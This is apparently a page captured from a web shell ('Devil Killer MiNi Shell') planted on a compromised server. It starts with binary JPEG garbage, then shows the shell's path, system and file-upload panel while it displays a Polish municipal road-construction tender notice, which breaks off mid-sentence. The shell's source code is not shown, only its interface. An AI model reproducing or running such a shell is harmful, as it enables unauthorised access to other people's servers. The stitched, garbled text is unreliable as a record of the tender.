JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210916/0018236701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej w m. Rykaczewo II etap </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechanów</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Gminy Ciechanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fabryczna 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 6722210</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">23 6722646</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@gminaciechanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.gminaciechanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej w m. Rykaczewo II etap </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e22c077d-16c4-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002662/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Przebudowa drogi gminnej w m. Rykaczewo II etap</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.gminaciechanow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Ofertę należy złożyć przy użyciu środków komunikacji elektronicznej . do złożenia oferty dostępna jest platforma przetargowa Gminy Ciechanów pod adresem www gmina Ciechanów /BIP/ przetargi wg nowej ustawy-logintrade Plarforma dla Wykonawcy jest bezpłatna<br/>5. W celu złożenia oferty należy zarejestrować się ( zalogować) na Platformie Przetargowej i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego.<br/>www.gmina ciechanow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Ciechanów: <br/><br/>1)	dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/><br/>2)	pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet <br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax <br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500KB/s<br/>•	zainstalowany Acrobat Reader <br/>•	zainstalowane środowisko uruchomieniowe Java – Jawa SE Runtime Environment 6 Update 24 lub nowszy<br/><br/>3)	Oświadczenia lub dokumenty przekazywane są za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie paragrafu 2 ust. 1i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r w sprawie sposobu sporządzania i przekazywania informacji, oraz wymagań technicznych dla dokumentów elektronicznych, oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub konkursie ( Dz .U z 2020 r poz 2452)<br/> <br/> <br/>7 .Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www. gminaciechanow.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO obowiązek informacyjny: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) dalej RODO, informuje ,że administratorem Pani/Pana danych jest Urząd Gminy Ciechanów ul Fabryczna 8 06-400 Ciechanów. Kontakt z administratorem bezpieczeństwa informacji w Urzędzie Gminy urzad@gminaciechanow.pl, lub adres Ul. Fabryczna 8 06-400 Ciechanów. Pani/Pana dane osobowe przetwarzane będą na podstawie art6 ust.1 lit.c RODO w celu wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym postepowaniem o udzielenie zamówienia publicznego. Odbiorcami Pani/pana danych osobowych będą osoby, lub podmioty ,którym udostepniona zostanie dokumentacja postepowania o udzielenie zamówienia publicznego w oparciu o art.74 ustawy z dnia 11 września2019 r. Prawo Zamówień Publicznych. Dane będą przechowywane zgodnie z art.78 ust.1 ustawy PZP przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania obejmuje cały czas trwania umowy ,a po tym czasie przez okres wymagany przepisami szczególnymi , a w szczególności kategorię archiwalną ( dokumentacja postepowania 5 lat, umowa 10 lat.) <br/>Obowiązek podania przez Panią/Pana danych osobowych, jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanych z udziałem w postepowaniu o udzielenie zamówienia publicznego – w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania) Posiada Pani/Pan na podstawie art15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczacych na podstawie art.16 RODO prawo do sprostowania danych osobowych; na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków o których mowa w art. 18ust 2RODO ;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących , narusza przepisy RODO. Nie przysługuje Pani/Panu w związku z art.17 ust3 lit.b,d lub e R ODO prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO; na podstawieart21 RODO prawo sprzeciwu, wobec przetwarzanych danych osobowych, gdyż podstawa prawna przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit.c Rodo, pszysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych ul Stawki 2 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 600000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W skład każdego zadania wchodzi: roboty przygotowawcze, roboty ziemne, chodnik z kostki brukowej, ,podbudowa, nawierzchnia, oznakowanie, odwodnienie ,roboty wykończeniowe , obsluga geodezyjna po stronie zamawiającego<br/> Wykaz zadań w zamówieniu:<br/> 1. Przebudowa DW w m. Rykaczewo na długości 0,293 km <br/>2 Przebudowa DW na działce 76/1 w m. Rykaczewo na długości 0,198 km<br/> <br/> <br/> <br/> <br/> Szczegółowy opis przedmiotów zamówienia zawiera przedmiar robót ( kosztorys ofertowy), szczegółowe specyfikacje techniczne i projekty budowlane <br/> UWAGA . Wszelkie użyte w dokumentacji stanowiącej opis przedmiotu zamówienia wskazania znaków towarowych, patentów lub pochodzenia materiałów należy traktować jako materiał informacyjny. We wszystkich przypadkach dopuszczalne jest zastosowanie materiałów równoważnych Prace powinny być wykonane zgodnie z obowiązującymi przepisami i normami branżowymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">konieczność wykonania robót nie przewidzianych w projekcie, bez których przedmiot zamówienia nie będzie mógł być odebrany po cenach z przetargu</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane, w poszczególnych częściach zamówienia, według następujących<br/> kryteriów:<br/> najniższa cena – waga kryterium 60%,<br/> długość okresu gwarancji– waga kryterium 40%. dotyczy : <br/>20.2. Liczba punktów uzyskanych w kryterium „najniższa cena” będzie obliczana zgodnie<br/> z poniższym wzorem: <br/> C min<br/> P1 = ................... x 60 pkt<br/> C bad<br/> gdzie:<br/> C min - najniższa cena spośród badanych ofert<br/> C bad – cena oferty badanej<br/><br/> P1 – liczba punktów badanej oferty w kryterium cena przy czym 1 pkt odpowiada 1%.<br/>20.	3. Liczba punktów uzyskanych w kryterium „ okres gwarancji” będzie obliczana zgodnie<br/> z poniższym wzorem:<br/> Gbad - Gmin<br/> P2 = ............................. x 40 pkt<br/> Gmax - Gmin<br/> P2 – liczba punktów badanej oferty w kryterium „okres gwarancji” przy czym 1 pkt<br/> odpowiada 1%.<br/> Uwaga: okres gwarancji musi być podany w Formularzu oferty w pełnych miesiącach<br/> (minimum36 miesięcy, maksymalnie 60 miesięcy).<br/>20.4. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą sumę punktów<br/> . Z podsumowania wszystkich cen jednostkowych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 112 ust.1 ustawy pzp i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z opisem zamieszczonym poniżej, oraz niepodlegający wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 ust 1 i art. 109 ust.1 pkt 1 i 4 ustawy pzp.<br/>2.	Wykonawcy zobowiązani będą spełnić warunki dotyczące:<br/>1) zdolności technicznej lub zawodowej<br/>Na potwierdzenie spełniania warunku Wykonawcy ubiegający się o udzielenie zamówienia wykażą, że:<br/>a) zrealizowali w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum 3 roboty polegającą na wykonaniu robót w zakresie tego zamówienia<br/>b) dysponują osobami, które będą uczestniczyć w realizacji zamówienia w szczególności pełniącą funkcję :<br/>	Kierownika budowy - co najmniej 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w branży drogowej bez ograniczeń lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności oraz posiadać przynależność do Izby Inżynierów Budownictwa.<br/>w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831)<br/>wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>Dopuszcza się uprawnienia równoważne do powyższych wydane na podstawie wcześniej obowiązujących przepisów prawa. W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>2) sytuacji ekonomicznej<br/> Zamawiający nie określa warunków w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>9.2.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>9.3.	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia stanowi Załącznik A do SWZ.;<br/>9.4.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wzór oświadczenia stanowi Załącznik nr B do SWZ. <br/>9.5.	Wykaz robót załącznik nr.5 do SWZ<br/>9.6.	Wykaz osób zał. Nr.6 doSWZ<br/> <br/>9.7.	Formularz OFERTA zał do SWZ<br/><br/>9.8.	Kosztorysy ofertowe oddzielnie na każde zadanie (załącznik do swz przedmiar robót)<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa wyżej składa każdy z Wykonawców.<br/>W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca dołącza również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>10.	Oferta oraz oświadczenie o niepodleganiu wykluczeniu muszą być złożone w<br/>oryginale.<br/>11.	Zamawiający zaleca ponumerowanie stron oferty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w wysokości 10 000,00 zł <br/> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium<br/> w wysokości 10 000,00 zł (słownie dziesięć tysięcy złotych). <br/> Wadium może być wnoszone:<br/><br/> . przelewem – wpłacane na rachunek Gminy Ciechanów BS Płońsk o/ Ciechanów . Nr 24 8230 0007 3000 5019 2000 0002<br/> dopiskiem ,, Wadium – przetarg przebudowa drogi w m. Rykaczewo II etap<br/> UWAGA: W przypadku wnoszenia wadium na rzecz Wykonawcy przez inny<br/> podmiot, w tytule przelewu należy wyraźnie wskazać na rzecz jakiego Wykonawcy<br/> wnoszone jest wadium.<br/> . w poręczeniach bankowych, poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-<br/> kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach<br/> udzielanych przez podmiot o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada<br/> 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U.<br/> z 2016 r. poz. 359) – składane w oryginale w kasie Urzędu Gminy Ciechanów za<br/> potwierdzeniem przyjęcia pod upływem terminu składania ofert lub załączane do oferty<br/> (tj. w kopercie z ofertą, w takim przypadku zamawiający przekaże oryginał dokumentu <br/> stanowiącego wadium do kasy).<br/> W przypadku załączenia dokumentu do koperty zawierającej ofertę należy pamiętać, aby<br/> nie spinać ww. dokumentu z ofertą i nie numerować go jak kolejnej strony tej oferty!<br/> Dokument ten bowiem ma zapewniać możliwość swobodnego przekazania do kasy, bez<br/> konieczności naruszania integralności samej oferty;…………………………………….<br/> Dopuszczalne jest złożenie wadium w więcej niż jednej formie.<br/> Właściwa kasa Urzędu Gminy Ciechanów znajduje się w budynku adres: .Urząd<br/> Gminy Ciechanów ul. Fabryczna 8 <br/> na parterze – jest czynna do poniedziałku do piątku w godzinach 8 do <br/><br/> Kasa potwierdza jedynie przyjęcie dokumenty stanowiącego wadium nie zajmuje się oceną,<br/> czy spełnia ona wymagania Zamawiającego.<br/><br/> Wymagania dotyczące wnoszenia wadium , przechowywania , zwrotu<br/> Będą się odbywać na podstawie art.97-98 ustawy PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający żąda wniesienia wadium w wysokości 10 000,00 zł <br/> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium<br/> w wysokości 10 000,00 zł (słownie dziesięć tysięcy złotych). <br/> Wadium może być wnoszone:<br/><br/> . przelewem – wpłacane na rachunek Gminy Ciechanów BS Płońsk o/ Ciechanów . Nr 24 8230 0007 3000 5019 2000 0002<br/> dopiskiem ,, Wadium – przetarg przebudowa drogi w m. Rykaczewo II etap<br/> UWAGA: W przypadku wnoszenia wadium na rzecz Wykonawcy przez inny<br/> podmiot, w tytule przelewu należy wyraźnie wskazać na rzecz 